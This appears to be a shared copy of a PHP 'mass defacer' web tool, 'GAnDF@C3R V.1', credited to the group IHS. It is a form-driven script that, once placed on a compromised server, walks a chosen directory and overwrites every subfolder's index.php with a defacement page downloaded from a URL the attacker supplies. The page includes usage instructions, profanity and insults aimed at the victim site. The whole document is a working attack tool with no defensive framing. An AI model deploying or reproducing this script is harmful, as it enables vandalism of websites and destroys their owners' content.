Vous êtes sur la page 1sur 3

<HTML>

<Title>GAnDF@C3R V.1 ||| M@$$ D3F@C3®</title>


<style>
h4{
color: orange;
}
.button3 {
background-color: black;
color: #f44336;
border: 2px solid #f44336;
}

.button3:hover {
background-color: #f44336;
color: white;
}

.tb2 {
background-color : black;
border: 1px solid blue;
width: 230px;
Color: blue;
}

h1{
color: red;
text-decoration: underline overline;
}
.tb3 {
border: 2px dashed #D1C7AC;
Padding-left: 5px;
background: black;
Color: yellow;
}
hr.style-four {
padding: 0;
border: none;
border-top: medium double aqua;
color: green;
text-align: center;
}
hr.style-four:after {
content: "[ User Input ]";
Color: aqua;
display: inline-block;
position: relative;
top: -0.7em;
font-size: 1.5em;
padding: 0 0.25em;
background: black;
</style>
<body BGcolor="black">
<font color="lime">
<p align="center">
<H1 font color="red" align="center">[ GAnDF@C3R V.1 ]</h1>
<p>
<h3 align="center">~~Mass Defacer By IHS~~ </H3>
<p>
<h4 align="center"><?php echo $_SERVER['SERVER_NAME'] ?> Ki Maa Ki A@Nkh </h4>
<p>
<marquee behavior="alternate"><marquee width="200"><font color="violet"><i>By
Psychotic-Wolf And R3D#@X0R_2H1N</I></font></marquee></marquee>
<hr color="orange">
<hr color="white">
<hr color="green">
<p>
<?php
/*
Mass deface v.1
*/

echo "<center><textarea rows='10' cols='100' class=' tb3'>";


$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";

if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir.$file)=="dir"){
$newfile=$dir.$file."/index.php";
echo $newfile."\n";
if (!copy($defaceurl, $newfile)) {
echo "failed to copy $file BC Tumhari gand
fatgyi :3\n";
}
}
}
closedir($dh);
}
}
echo "</textarea></center>";
?>
<br><p>
<hr class="style-four">
<p align="center">

<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>


<p align="center">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo
getcwd() . "/"; ?>' name='massdefacedir' class=" tb2">
<p align="center">
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'
class="tb2">
<p align="center">
<input type='submit' name='execmassdeface' value='Bhosdi Wale Ki Gand Maro'
class="button3"></form>

<font color="gray">

<br><br><p align="center">
** Main Directory = The Directory you want to mass deface (Must have read/write
permission) **<br>
** Defacement Url = URL of your deface page (e.g: http://yoursite.com/deface.html )
**<br><br>
<font color="pink"><b>© 2016 || IHS || Private Script || GAnDF@C3R V.1</b>
</body></html>

Vous aimerez peut-être aussi